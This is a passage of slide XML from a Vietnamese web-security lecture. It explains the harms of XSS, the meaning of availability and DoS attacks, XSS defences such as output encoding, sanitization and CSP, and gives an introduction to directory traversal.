              <a:t>Chiếm quyền điều khiển phiên và truy cập vào tài khoản người dùng.</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Giả mạo và chuyển hướng: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Chuyển hướng người dùng đến các trang lừa đảo (phishing).</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Keylogging: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Theo dõi thao tác gõ phím của người dùng để đánh cắp mật khẩu hoặc dữ liệu nhạy cảm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48759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8DD26-0F55-45D9-D630-3825972807B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B8F0E1-62B7-2D8D-4A25-35D1801151F1}"/>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F2D30374-32DE-1EE8-C029-2C7C53673589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="7051040" cy="659155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t>Availability (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>Tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>sẵn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0" err="1"/>
              <a:t>sàng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-25" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D270CCD-FABC-5643-3AE0-6854E80D97A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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BACBE2-CDB3-12BE-E0CB-E58275A02977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1256791"/>
            <a:ext cx="7630159" cy="2795637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Đảm bảo hệ thống, ứng dụng và dữ liệu luôn truy cập được cho người dùng được ủy quyền.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Vi phạm: Các cuộc tấn công Từ chối Dịch vụ (DoS) và Từ chối Dịch vụ Phân tán (DDoS) trực tiếp nhắm vào mục tiêu này bằng cách làm quá tải hệ thống.</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2837457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14A5D-A5A6-8EB6-CACD-E2E781B9F28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FD88A18-3753-BB87-2564-F3F4B1E482C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FA950FA4-927C-0C2B-BEF9-3ED4C924F82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.2.3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBE4F72-8DEA-B51A-B369-A85D1463AFC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50</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF3AE66-A3B2-8594-B9D8-B74F16E70E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1104900"/>
            <a:ext cx="8915400" cy="251607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Thực thi các hành vi độc hại: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Buộc người dùng thực hiện các hành động trong phạm vi quyền hạn của họ (ví dụ: giao dịch, thay đổi mật khẩu).</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Chèn mã độc hại: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Cài đặt phần mềm độc hại (malware) hoặc ransomware.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4275387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6A7B0-87D2-14E7-CD80-61C1B9E48E7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62C71C5-44F7-61E3-15AD-7872C7F8B5E1}"/>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425D8F4E-F687-B3F1-453F-5DDF17D0F531}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.2.4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>vệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>yếu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70C6C15D-A989-8D0D-4EDA-B23494D0F84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51</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DAC8DBA-6FCA-412F-A507-BF0AAC0BF0AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99884" y="1734290"/>
            <a:ext cx="8915400" cy="390106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Mã hóa đầu ra (Output Encoding): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mã hóa các ký tự đặc biệt (&lt;, &gt;, ", ') thành các thực thể HTML, buộc trình duyệt coi chúng là văn bản thuần túy.</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Xác thực và lọc dữ liệu đầu vào (input validation &amp; sanitization): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kiểm tra nghiêm ngặt dữ liệu đầu vào và sử dụng thư viện lọc (Sanitizer) để loại bỏ các thẻ HTML/JavaScript nguy hiểm (ví dụ: &lt;script&gt;,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> onerror).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30974528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7427C-CDD5-379D-B9F4-BDC3AB29ED6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6BB4F72-C47D-BF26-A416-3FE9ABA0CE3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C53812B5-5835-04AE-6621-D5B2D3AC9335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.2.4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>vệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>yếu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1DE26E-0B61-419B-0A58-AF48A3304E2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52</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A8EE6E-6B2B-C640-EC94-BA1D9CCFA323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99884" y="1734290"/>
            <a:ext cx="8915400" cy="343940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Content Security Policy (CSP): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lớp bảo mật bổ sung, chỉ định nguồn nội dung nào được phép tải và thực thi, ngăn chặn việc tải script từ các nguồn không được phép.</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Sử dụng công cụ quét lỗ hổng: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thường xuyên dùng các công cụ chuyên dụng (ví dụ: Burp Suite, OWASP ZAP) để phát hiện lỗ hổng XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="738776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2D037-8F29-72E1-1A49-5716423A068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695123-C77E-19DA-4F59-D5C25EA1694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9D9F573F-DDE9-C7B5-7C81-52161B2234DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> Directory Traversal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> File Inclusion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.3.1.Giới </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> Directory Traversal</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B48D0047-CBA0-43B8-4D53-F28E57F9B4E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53</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D500FBDF-F9F8-D5E1-C034-619626CA029D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10297" y="2241963"/>
            <a:ext cx="8915400" cy="297773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Định nghĩa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: Lỗ hổng bảo mật web nghiêm trọng cho phép kẻ tấn công truy cập vào các tệp và thư mục nằm ngoài phạm vi được phép của ứng dụng web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>.</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Phát sinh do ứng dụng web không xác thực hoặc lọc đầy đủ các tham số đầu vào liên quan đến đường dẫn tệp.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="893623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F25AD-BE88-A4CD-B56A-7D098CD90CA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9E18EE-929E-3482-FC77-E600200AD4A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4B34A666-8D09-58D5-A943-186BBB372746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.3.1.Giới </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> Directory Traversal</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
